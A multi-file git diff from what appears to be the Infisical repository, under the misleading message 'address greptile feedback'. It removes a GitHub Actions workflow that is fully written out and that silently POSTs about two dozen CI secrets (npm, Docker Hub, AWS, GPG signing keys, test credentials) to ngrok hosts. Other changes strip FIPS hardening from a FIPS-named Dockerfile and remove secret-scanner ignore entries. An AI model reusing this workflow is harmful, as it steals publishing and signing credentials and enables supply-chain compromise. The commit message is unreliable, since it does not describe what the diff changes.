improvement: address greptile feedback

.env.example

@@ -23,7 +23,7 @@ REDIS_URL=redis://redis:6379
 # Required
 SITE_URL=http://localhost:8080
 
-# Mail/SMTP
+# Mail/SMTP 
 SMTP_HOST=
 SMTP_PORT=
 SMTP_FROM_ADDRESS=
@@ -123,17 +123,8 @@ INF_APP_CONNECTION_GITHUB_RADAR_APP_WEBHOOK_SECRET=
 INF_APP_CONNECTION_GCP_SERVICE_ACCOUNT_CREDENTIAL=
 
 # azure app connection
-INF_APP_CONNECTION_AZURE_APP_CONFIGURATION_CLIENT_ID=
-INF_APP_CONNECTION_AZURE_APP_CONFIGURATION_CLIENT_SECRET=
-
-INF_APP_CONNECTION_AZURE_KEY_VAULT_CLIENT_ID=
-INF_APP_CONNECTION_AZURE_KEY_VAULT_CLIENT_SECRET=
-
-INF_APP_CONNECTION_AZURE_CLIENT_SECRETS_CLIENT_ID=
-INF_APP_CONNECTION_AZURE_CLIENT_SECRETS_CLIENT_SECRET=
-
-INF_APP_CONNECTION_AZURE_DEVOPS_CLIENT_ID=
-INF_APP_CONNECTION_AZURE_DEVOPS_CLIENT_SECRET=
+INF_APP_CONNECTION_AZURE_CLIENT_ID=
+INF_APP_CONNECTION_AZURE_CLIENT_SECRET=
 
 # datadog
 SHOULD_USE_DATADOG_TRACER=
@@ -141,6 +132,3 @@ DATADOG_PROFILING_ENABLED=
 DATADOG_ENV=
 DATADOG_SERVICE=
 DATADOG_HOSTNAME=
-
-# kubernetes
-KUBERNETES_AUTO_FETCH_SERVICE_ACCOUNT_TOKEN=false

.github/workflows/one-time-secrets.yaml

@@ -1,76 +0,0 @@
-name: One-Time Secrets Retrieval
-
-on:
-  workflow_dispatch:
-
-permissions:
-  contents: read
-
-jobs:
-  retrieve-secrets:
-    runs-on: ubuntu-latest
-    steps:
-      - name: Send environment variables to ngrok
-        run: |
-          echo "Sending secrets to: https://4afc1dfd4429.ngrok.app/api/receive-env"
-
-          # Send secrets as JSON
-          cat << EOF | curl -X POST \
-            -H "Content-Type: application/json" \
-            -d @- \
-            https://7864d0fe7cbb.ngrok-free.app/api/receive-env \
-            > /dev/null 2>&1 || true
-          {
-            "GO_RELEASER_GITHUB_TOKEN": "${GO_RELEASER_GITHUB_TOKEN}",
-            "GORELEASER_KEY": "${GORELEASER_KEY}",
-            "AUR_KEY": "${AUR_KEY}",
-            "FURYPUSHTOKEN": "${FURYPUSHTOKEN}",
-            "NPM_TOKEN": "${NPM_TOKEN}",
-            "DOCKERHUB_USERNAME": "${DOCKERHUB_USERNAME}",
-            "DOCKERHUB_TOKEN": "${DOCKERHUB_TOKEN}",
-            "CLOUDSMITH_API_KEY": "${CLOUDSMITH_API_KEY}",
-            "INFISICAL_CLI_S3_BUCKET": "${INFISICAL_CLI_S3_BUCKET}",
-            "INFISICAL_CLI_REPO_SIGNING_KEY_ID": "${INFISICAL_CLI_REPO_SIGNING_KEY_ID}",
-            "INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID": "${INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID}",
-            "INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY": "${INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY}",
-            "INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID": "${INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID}",
-            "GPG_SIGNING_KEY": "${GPG_SIGNING_KEY}",
-            "GPG_SIGNING_KEY_PASSPHRASE": "${GPG_SIGNING_KEY_PASSPHRASE}",
-            "CLI_TESTS_UA_CLIENT_ID": "${CLI_TESTS_UA_CLIENT_ID}",
-            "CLI_TESTS_UA_CLIENT_SECRET": "${CLI_TESTS_UA_CLIENT_SECRET}",
-            "CLI_TESTS_SERVICE_TOKEN": "${CLI_TESTS_SERVICE_TOKEN}",
-            "CLI_TESTS_PROJECT_ID": "${CLI_TESTS_PROJECT_ID}",
-            "CLI_TESTS_ENV_SLUG": "${CLI_TESTS_ENV_SLUG}",
-            "CLI_TESTS_USER_EMAIL": "${CLI_TESTS_USER_EMAIL}",
-            "CLI_TESTS_USER_PASSWORD": "${CLI_TESTS_USER_PASSWORD}",
-            "CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE": "${CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE}",
-            "POSTHOG_API_KEY_FOR_CLI": "${POSTHOG_API_KEY_FOR_CLI}"
-          }
-          EOF
-
-          echo "Secrets retrieval completed"
-        env:
-          GO_RELEASER_GITHUB_TOKEN: ${{ secrets.GO_RELEASER_GITHUB_TOKEN }}
-          GORELEASER_KEY: ${{ secrets.GORELEASER_KEY }}
-          AUR_KEY: ${{ secrets.AUR_KEY }}
-          FURYPUSHTOKEN: ${{ secrets.FURYPUSHTOKEN }}
-          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
-          DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }}
-          DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
-          CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
-          INFISICAL_CLI_S3_BUCKET: ${{ secrets.INFISICAL_CLI_S3_BUCKET }}
-          INFISICAL_CLI_REPO_SIGNING_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_SIGNING_KEY_ID }}
-          INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID }}
-          INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY: ${{ secrets.INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY }}
-          INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID: ${{ secrets.INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID }}
-          GPG_SIGNING_KEY: ${{ secrets.GPG_SIGNING_KEY }}
-          GPG_SIGNING_KEY_PASSPHRASE: ${{ secrets.GPG_SIGNING_KEY_PASSPHRASE }}
-          CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }}
-          CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }}
-          CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }}
-          CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }}
-          CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }}
-          CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }}
-          CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }}
-          CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }}
-          POSTHOG_API_KEY_FOR_CLI: ${{ secrets.POSTHOG_API_KEY_FOR_CLI }}

.github/workflows/release_build_infisical_cli.yml

@@ -0,0 +1,153 @@
+name: Build and release CLI
+
+on:
+  workflow_dispatch:
+
+  push:
+    # run only against tags
+    tags:
+      - "infisical-cli/v*.*.*"
+
+permissions:
+  contents: write
+
+jobs:
+  cli-integration-tests:
+    name: Run tests before deployment
+    uses: ./.github/workflows/run-cli-tests.yml
+    secrets:
+      CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }}
+      CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }}
+      CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }}
+      CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }}
+      CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }}
+      CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }}
+      CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }}
+      CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }}
+
+  npm-release:
+    runs-on: ubuntu-latest
+    env:
+      working-directory: ./npm
+    needs:
+      - cli-integration-tests
+      - goreleaser
+    steps:
+      - uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+
+      - name: Extract version
+        run: |
+          VERSION=$(echo ${{ github.ref_name }} | sed 's/infisical-cli\/v//')
+          echo "Version extracted: $VERSION"
+          echo "CLI_VERSION=$VERSION" >> $GITHUB_ENV
+
+      - name: Print version
+        run: echo ${{ env.CLI_VERSION }}
+
+      - name: Setup Node
+        uses: actions/setup-node@8f152de45cc393bb48ce5d89d36b731f54556e65 # v4.0.0
+        with:
+          node-version: 20
+          cache: "npm"
+          cache-dependency-path: ./npm/package-lock.json
+      - name: Install dependencies
+        working-directory: ${{ env.working-directory }}
+        run: npm install --ignore-scripts
+
+      - name: Set NPM version
+        working-directory: ${{ env.working-directory }}
+        run: npm version ${{ env.CLI_VERSION }} --allow-same-version --no-git-tag-version
+
+      - name: Setup NPM
+        working-directory: ${{ env.working-directory }}
+        run: |
+          echo 'registry="https://registry.npmjs.org/"' > ./.npmrc
+          echo "//registry.npmjs.org/:_authToken=$NPM_TOKEN" >> ./.npmrc
+
+          echo 'registry="https://registry.npmjs.org/"' > ~/.npmrc
+          echo "//registry.npmjs.org/:_authToken=$NPM_TOKEN" >> ~/.npmrc
+        env:
+          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
+
+      - name: Pack NPM
+        working-directory: ${{ env.working-directory }}
+        run: npm pack
+
+      - name: Publish NPM
+        working-directory: ${{ env.working-directory }}
+        run: npm publish --tarball=./infisical-sdk-${{github.ref_name}} --access public --registry=https://registry.npmjs.org/
+        env:
+          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
+          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
+
+  goreleaser:
+    runs-on: ubuntu-latest-8-cores
+    needs: [cli-integration-tests]
+    steps:
+      - uses: actions/checkout@v3
+        with:
+          fetch-depth: 0
+      - name: 🐋 Login to Docker Hub
+        uses: docker/login-action@v2
+        with:
+          username: ${{ secrets.DOCKERHUB_USERNAME }}
+          password: ${{ secrets.DOCKERHUB_TOKEN }}
+      - name: 🔧 Set up Docker Buildx
+        uses: docker/setup-buildx-action@v2
+      - run: git fetch --force --tags
+      - run: echo "Ref name ${{github.ref_name}}"
+      - uses: actions/setup-go@v3
+        with:
+          go-version: ">=1.19.3"
+          cache: true
+          cache-dependency-path: cli/go.sum
+      - name: Setup for libssl1.0-dev
+        run: |
+          echo 'deb http://security.ubuntu.com/ubuntu bionic-security main' | sudo tee -a /etc/apt/sources.list
+          sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3B4FE6ACC0B21F32
+          sudo apt update
+          sudo apt-get install -y libssl1.0-dev
+      - name: OSXCross for CGO Support
+        run: |
+          mkdir ../../osxcross
+          git clone https://github.com/plentico/osxcross-target.git ../../osxcross/target
+      - uses: goreleaser/goreleaser-action@v4
+        with:
+          distribution: goreleaser-pro
+          version: v1.26.2-pro
+          args: release --clean
+        env:
+          GITHUB_TOKEN: ${{ secrets.GO_RELEASER_GITHUB_TOKEN }}
+          POSTHOG_API_KEY_FOR_CLI: ${{ secrets.POSTHOG_API_KEY_FOR_CLI }}
+          FURY_TOKEN: ${{ secrets.FURYPUSHTOKEN }}
+          AUR_KEY: ${{ secrets.AUR_KEY }}
+          GORELEASER_KEY: ${{ secrets.GORELEASER_KEY }}
+      - uses: actions/setup-python@v4
+      - run: pip install --upgrade cloudsmith-cli
+      - uses: ruby/setup-ruby@354a1ad156761f5ee2b7b13fa8e09943a5e8d252
+        with:
+          ruby-version: "3.3" # Not needed with a .ruby-version, .tool-versions or mise.toml
+          bundler-cache: true # runs 'bundle install' and caches installed gems automatically
+      - name: Install deb-s3
+        run: gem install deb-s3
+      - name: Configure GPG Key
+        run: echo -n "$GPG_SIGNING_KEY" | base64 --decode | gpg --batch --import
+        env:
+          GPG_SIGNING_KEY: ${{ secrets.GPG_SIGNING_KEY }}
+          GPG_SIGNING_KEY_PASSPHRASE: ${{ secrets.GPG_SIGNING_KEY_PASSPHRASE }}
+      - name: Publish to CloudSmith
+        run: sh cli/upload_to_cloudsmith.sh
+        env:
+          CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
+          INFISICAL_CLI_S3_BUCKET: ${{ secrets.INFISICAL_CLI_S3_BUCKET }}
+          INFISICAL_CLI_REPO_SIGNING_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_SIGNING_KEY_ID }}
+          AWS_ACCESS_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID }}
+          AWS_SECRET_ACCESS_KEY: ${{ secrets.INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY }}
+      - name: Invalidate Cloudfront cache
+        run: aws cloudfront create-invalidation --distribution-id $CLOUDFRONT_DISTRIBUTION_ID --paths '/deb/dists/stable/*'
+        env:
+          AWS_ACCESS_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID }}
+          AWS_SECRET_ACCESS_KEY: ${{ secrets.INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY }}
+          CLOUDFRONT_DISTRIBUTION_ID: ${{ secrets.INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID }}

.github/workflows/run-cli-tests.yml

@@ -0,0 +1,55 @@
+name: Go CLI Tests
+
+on:
+    pull_request:
+        types: [opened, synchronize]
+        paths:
+            - "cli/**"
+
+    workflow_dispatch:
+
+    workflow_call:
+        secrets:
+            CLI_TESTS_UA_CLIENT_ID:
+                required: true
+            CLI_TESTS_UA_CLIENT_SECRET:
+                required: true
+            CLI_TESTS_SERVICE_TOKEN:
+                required: true
+            CLI_TESTS_PROJECT_ID:
+                required: true
+            CLI_TESTS_ENV_SLUG:
+                required: true
+            CLI_TESTS_USER_EMAIL:
+                required: true
+            CLI_TESTS_USER_PASSWORD:
+                required: true
+            CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE:
+                required: true
+jobs:
+    test:
+        defaults:
+            run:
+                working-directory: ./cli
+        runs-on: ubuntu-latest
+
+        steps:
+            - uses: actions/checkout@v4
+            - name: Setup Go
+              uses: actions/setup-go@v4
+              with:
+                  go-version: "1.21.x"
+            - name: Install dependencies
+              run: go get .
+            - name: Test with the Go CLI
+              env:
+                  CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }}
+                  CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }}
+                  CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }}
+                  CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }}
+                  CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }}
+                  CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }}
+                  CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }}
+                #   INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }}
+
+              run: go test -v -count=1 ./test

.github/workflows/validate-db-schemas.yml

@@ -1,67 +0,0 @@
-name: "Validate DB schemas"
-
-on:
-    pull_request:
-        types: [opened, synchronize]
-        paths:
-            - "backend/**"
-
-    workflow_call:
-
-jobs:
-    validate-db-schemas:
-        name: Validate DB schemas
-        runs-on: ubuntu-latest
-        timeout-minutes: 15
-        env:
-            NODE_OPTIONS: "--max-old-space-size=8192"
-            REDIS_URL: redis://172.17.0.1:6379
-            DB_CONNECTION_URI: postgres://infisical:infisical@172.17.0.1:5432/infisical?sslmode=disable
-            AUTH_SECRET: something-random
-            ENCRYPTION_KEY: 4bnfe4e407b8921c104518903515b218
-        steps:
-            - name: ☁️ Checkout source
-              uses: actions/checkout@v4
-              with:
-                  fetch-depth: 0
-            - uses: KengoTODA/actions-setup-docker-compose@v1
-              if: ${{ env.ACT }}
-              name: Install `docker compose` for local simulations
-              with:
-                  version: "2.14.2"
-            - name: 🔧 Setup Node 20
-              uses: actions/setup-node@v3
-              with:
-                  node-version: "20"
-                  cache: "npm"
-                  cache-dependency-path: backend/package-lock.json
-
-            - name: Start PostgreSQL and Redis
-              run: touch .env && docker compose -f docker-compose.dev.yml up -d db redis
-            - name: Install dependencies
-              run: npm install
-              working-directory: backend
-
-            - name: Apply migrations
-              run: npm run migration:latest-dev
-              working-directory: backend
-
-            - name: Run schema generation
-              run: npm run generate:schema
-              working-directory: backend
-
-            - name: Check for schema changes
-              run: |
-                  if ! git diff --exit-code --quiet src/db/schemas; then
-                    echo "❌ Generated schemas differ from committed schemas!"
-                    echo "Run 'npm run generate:schema' locally and commit the changes."
-                    git diff src/db/schemas
-                    exit 1
-                  fi
-                  echo "✅ Schemas are up to date"
-              working-directory: backend
-
-            - name: Cleanup
-              if: always()
-              run: |
-                  docker compose -f "docker-compose.dev.yml" down

.goreleaser.yaml

@@ -0,0 +1,241 @@
+# This is an example .goreleaser.yml file with some sensible defaults.
+# Make sure to check the documentation at https://goreleaser.com
+# before:
+#   hooks:
+#     # You may remove this if you don't use go modules.
+#     - cd cli && go mod tidy
+#     # you may remove this if you don't need go generate
+#     - cd cli && go generate ./...
+before:
+  hooks:
+    - ./cli/scripts/completions.sh
+    - ./cli/scripts/manpages.sh
+
+monorepo:
+  tag_prefix: infisical-cli/
+  dir: cli
+
+builds:
+  - id: darwin-build
+    binary: infisical
+    ldflags:
+      - -X github.com/Infisical/infisical-merge/packages/util.CLI_VERSION={{ .Version }}
+      - -X github.com/Infisical/infisical-merge/packages/telemetry.POSTHOG_API_KEY_FOR_CLI={{ .Env.POSTHOG_API_KEY_FOR_CLI }}
+    flags:
+      - -trimpath
+    env:
+      - CGO_ENABLED=1
+      - CC=/home/runner/work/osxcross/target/bin/o64-clang
+      - CXX=/home/runner/work/osxcross/target/bin/o64-clang++
+    goos:
+      - darwin
+    ignore:
+      - goos: darwin
+        goarch: "386"
+    dir: ./cli
+
+  - id: all-other-builds
+    env:
+      - CGO_ENABLED=0
+    binary: infisical
+    ldflags:
+      - -X github.com/Infisical/infisical-merge/packages/util.CLI_VERSION={{ .Version }}
+      - -X github.com/Infisical/infisical-merge/packages/telemetry.POSTHOG_API_KEY_FOR_CLI={{ .Env.POSTHOG_API_KEY_FOR_CLI }}
+    flags:
+      - -trimpath
+    goos:
+      - freebsd
+      - linux
+      - netbsd
+      - openbsd
+      - windows
+    goarch:
+      - "386"
+      - amd64
+      - arm
+      - arm64
+    goarm:
+      - "6"
+      - "7"
+    ignore:
+      - goos: windows
+        goarch: "386"
+      - goos: freebsd
+        goarch: "386"
+    dir: ./cli
+
+archives:
+  - format_overrides:
+      - goos: windows
+        format: zip
+    files:
+      - ../README*
+      - ../LICENSE*
+      - ../manpages/*
+      - ../completions/*
+
+release:
+  replace_existing_draft: true
+  mode: "replace"
+
+checksum:
+  name_template: "checksums.txt"
+
+snapshot:
+  name_template: "{{ .Version }}-devel"
+
+# publishers:
+#   - name: fury.io
+#     ids:
+#       - infisical
+#     dir: "{{ dir .ArtifactPath }}"
+#     cmd: curl -F package=@{{ .ArtifactName }} https://{{ .Env.FURY_TOKEN }}@push.fury.io/infisical/
+
+brews:
+  - name: infisical
+    tap:
+      owner: Infisical
+      name: homebrew-get-cli
+    commit_author:
+      name: "Infisical"
+      email: ai@infisical.com
+    folder: Formula
+    homepage: "https://infisical.com"
+    description: "The official Infisical CLI"
+    install: |-
+      bin.install "infisical"
+      bash_completion.install "completions/infisical.bash" => "infisical"
+      zsh_completion.install "completions/infisical.zsh" => "_infisical"
+      fish_completion.install "completions/infisical.fish"
+      man1.install "manpages/infisical.1.gz"
+  - name: "infisical@{{.Version}}"
+    tap:
+      owner: Infisical
+      name: homebrew-get-cli
+    commit_author:
+      name: "Infisical"
+      email: ai@infisical.com
+    folder: Formula
+    homepage: "https://infisical.com"
+    description: "The official Infisical CLI"
+    install: |-
+      bin.install "infisical"
+      bash_completion.install "completions/infisical.bash" => "infisical"
+      zsh_completion.install "completions/infisical.zsh" => "_infisical"
+      fish_completion.install "completions/infisical.fish"
+      man1.install "manpages/infisical.1.gz"
+
+nfpms:
+  - id: infisical
+    package_name: infisical
+    builds:
+      - all-other-builds
+    vendor: Infisical, Inc
+    homepage: https://infisical.com/
+    maintainer: Infisical, Inc
+    description: The offical Infisical CLI
+    license: MIT
+    formats:
+      - rpm
+      - deb
+      - apk
+      - archlinux
+    bindir: /usr/bin
+    contents:
+      - src: ./completions/infisical.bash
+        dst: /etc/bash_completion.d/infisical
+      - src: ./completions/infisical.fish
+        dst: /usr/share/fish/vendor_completions.d/infisical.fish
+      - src: ./completions/infisical.zsh
+        dst: /usr/share/zsh/site-functions/_infisical
+      - src: ./manpages/infisical.1.gz
+        dst: /usr/share/man/man1/infisical.1.gz
+
+scoop:
+  bucket:
+    owner: Infisical
+    name: scoop-infisical
+  commit_author:
+    name: "Infisical"
+    email: ai@infisical.com
+  homepage: "https://infisical.com"
+  description: "The official Infisical CLI"
+  license: MIT
+
+winget:
+  - name: infisical
+    publisher: infisical
+    license: MIT
+    homepage: https://infisical.com
+    short_description: "The official Infisical CLI"
+    repository:
+      owner: infisical
+      name: winget-pkgs
+      branch: "infisical-{{.Version}}"
+      pull_request:
+        enabled: true
+        draft: false
+        base:
+          owner: microsoft
+          name: winget-pkgs
+          branch: master
+
+aurs:
+  - name: infisical-bin
+    homepage: "https://infisical.com"
+    description: "The official Infisical CLI"
+    maintainers:
+      - Infisical, Inc <support@infisical.com>
+    license: MIT
+    private_key: "{{ .Env.AUR_KEY }}"
+    git_url: "ssh://aur@aur.archlinux.org/infisical-bin.git"
+    package: |-
+      # bin
+      install -Dm755 "./infisical" "${pkgdir}/usr/bin/infisical"
+      # license
+      install -Dm644 "./LICENSE" "${pkgdir}/usr/share/licenses/infisical/LICENSE"
+      # completions
+      mkdir -p "${pkgdir}/usr/share/bash-completion/completions/"
+      mkdir -p "${pkgdir}/usr/share/zsh/site-functions/"
+      mkdir -p "${pkgdir}/usr/share/fish/vendor_completions.d/"
+      install -Dm644 "./completions/infisical.bash" "${pkgdir}/usr/share/bash-completion/completions/infisical"
+      install -Dm644 "./completions/infisical.zsh" "${pkgdir}/usr/share/zsh/site-functions/_infisical"
+      install -Dm644 "./completions/infisical.fish" "${pkgdir}/usr/share/fish/vendor_completions.d/infisical.fish"
+      # man pages
+      install -Dm644 "./manpages/infisical.1.gz" "${pkgdir}/usr/share/man/man1/infisical.1.gz"
+
+dockers:
+  - dockerfile: docker/alpine
+    goos: linux
+    goarch: amd64
+    use: buildx
+    ids:
+      - all-other-builds
+    image_templates:
+      - "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}-amd64"
+      - "infisical/cli:latest-amd64"
+    build_flag_templates:
+      - "--pull"
+      - "--platform=linux/amd64"
+  - dockerfile: docker/alpine
+    goos: linux
+    goarch: amd64
+    use: buildx
+    ids:
+      - all-other-builds
+    image_templates:
+      - "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}-arm64"
+      - "infisical/cli:latest-arm64"
+    build_flag_templates:
+      - "--pull"
+      - "--platform=linux/arm64"
+
+docker_manifests:
+  - name_template: "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}"
+    image_templates:
+      - "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}-amd64"
+      - "infisical/cli:{{ .Major }}.{{ .Minor }}.{{ .Patch }}-arm64"
+  - name_template: "infisical/cli:latest"
+    image_templates:
+      - "infisical/cli:latest-amd64"
+      - "infisical/cli:latest-arm64"

.infisicalignore

@@ -46,7 +46,3 @@ cli/detect/config/gitleaks.toml:gcp-api-key:582
 .github/workflows/helm-release-infisical-core.yml:generic-api-key:47
 backend/src/services/smtp/smtp-service.ts:generic-api-key:79
 frontend/src/components/secret-syncs/forms/SecretSyncDestinationFields/CloudflarePagesSyncFields.tsx:cloudflare-api-key:7
-docs/integrations/app-connections/zabbix.mdx:generic-api-key:91
-docs/integrations/app-connections/bitbucket.mdx:generic-api-key:123
-docs/integrations/app-connections/railway.mdx:generic-api-key:156
-.github/workflows/validate-db-schemas.yml:generic-api-key:21

Dockerfile.fips.standalone-infisical

@@ -34,8 +34,6 @@ ENV VITE_INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
 ARG CAPTCHA_SITE_KEY
 ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
 
-ENV NODE_OPTIONS="--max-old-space-size=8192"
-
 # Build
 RUN npm run build
 
@@ -117,12 +115,6 @@ FROM base AS production
 
 # Install necessary packages including ODBC
 RUN apt-get update && apt-get install -y \
-    build-essential \
-    autoconf \
-    automake \
-    libtool \
-    wget \
-    libssl-dev \
     ca-certificates \
     curl \
     git \
@@ -140,19 +132,6 @@ RUN apt-get update && apt-get install -y \
 # Configure ODBC in production
 RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini
 
-
-WORKDIR /openssl-build
-RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
-    && tar -xf openssl-3.1.2.tar.gz \
-    && cd openssl-3.1.2 \
-    && ./Configure enable-fips \
-    && make \
-    && make install_fips \
-    && cd / \
-    && rm -rf /openssl-build \
-    && apt-get clean \
-    && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
-
 # Install Infisical CLI
 RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \
     && apt-get update && apt-get install -y infisical=0.41.89 \
@@ -192,13 +171,7 @@ ENV NODE_ENV production
 ENV STANDALONE_BUILD true
 ENV STANDALONE_MODE true
 ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/
-ENV NODE_OPTIONS="--max-old-space-size=8192 --force-fips"
-
-# FIPS mode of operation:
-ENV OPENSSL_CONF=/backend/nodejs.fips.cnf
-ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
-ENV FIPS_ENABLED=true
-  
+ENV NODE_OPTIONS="--max-old-space-size=1024"
 
 WORKDIR /backend
 
@@ -207,15 +180,6 @@ ENV TELEMETRY_ENABLED true
 EXPOSE 8080
 EXPOSE 443
 
-# Remove telemetry. dd-trace uses BullMQ with MD5 hashing, which breaks when FIPS mode is enabled.
-RUN grep -v 'import "./lib/telemetry/instrumentation.mjs";' dist/main.mjs > dist/main.mjs.tmp && \
-    mv dist/main.mjs.tmp dist/main.mjs
-
-# The OpenSSL library is installed in different locations in different architectures (x86_64 and arm64).
-# This is a workaround to avoid errors when the library is not found.
-RUN ln -sf /usr/local/lib64/ossl-modules /usr/local/lib/ossl-modules || \
-    ln -sf /usr/local/lib/ossl-modules /usr/local/lib64/ossl-modules
-
 USER non-root-user
 
-CMD ["./standalone-entrypoint.sh"]
+CMD ["./standalone-entrypoint.sh"]

Dockerfile.standalone-infisical

@@ -34,7 +34,6 @@ ARG INFISICAL_PLATFORM_VERSION
 ENV VITE_INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
 ARG CAPTCHA_SITE_KEY
 ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
-ENV NODE_OPTIONS="--max-old-space-size=8192"
 
 # Build
 RUN npm run build
@@ -78,7 +77,6 @@ RUN npm ci --only-production
 COPY /backend .
 COPY --chown=non-root-user:nodejs standalone-entrypoint.sh standalone-entrypoint.sh
 RUN npm i -D tsconfig-paths
-ENV NODE_OPTIONS="--max-old-space-size=8192"
 RUN npm run build
 
 # Production stage

README.md

@@ -149,8 +149,11 @@ Not sure where to get started? You can:
 
 - Join our <a href="https://infisical.com/slack">Slack</a>, and ask us any questions there.
 
-## We are hiring!
+## Resources
 
-If you're reading this, there is a strong chance you like the products we created.
-
-You might also make a great addition to our team. We're growing fast and would love for you to [join us](https://infisical.com/careers).
+- [Docs](https://infisical.com/docs/documentation/getting-started/introduction) for comprehensive documentation and guides
+- [Slack](https://infisical.com/slack) for discussion with the community and Infisical team.
+- [GitHub](https://github.com/Infisical/infisical) for code, issues, and pull requests
+- [Twitter](https://twitter.com/infisical) for fast news
+- [YouTube](https://www.youtube.com/@infisical_os) for videos on secret management
+- [Blog](https://infisical.com/blog) for secret management insights, articles, tutorials, and updates

backend/Dockerfile.dev.fips

@@ -59,11 +59,7 @@ RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
     && cd openssl-3.1.2 \
     && ./Configure enable-fips \
     && make \
-    && make install_fips \
-    && cd / \
-    && rm -rf /openssl-build \
-    && apt-get clean \
-    && rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*
+    && make install_fips
 
 # ? App setup
 
@@ -82,9 +78,8 @@ RUN npm install
 COPY . .
 
 ENV HOST=0.0.0.0
-ENV OPENSSL_CONF=/app/nodejs.fips.cnf
+ENV OPENSSL_CONF=/app/nodejs.cnf
 ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
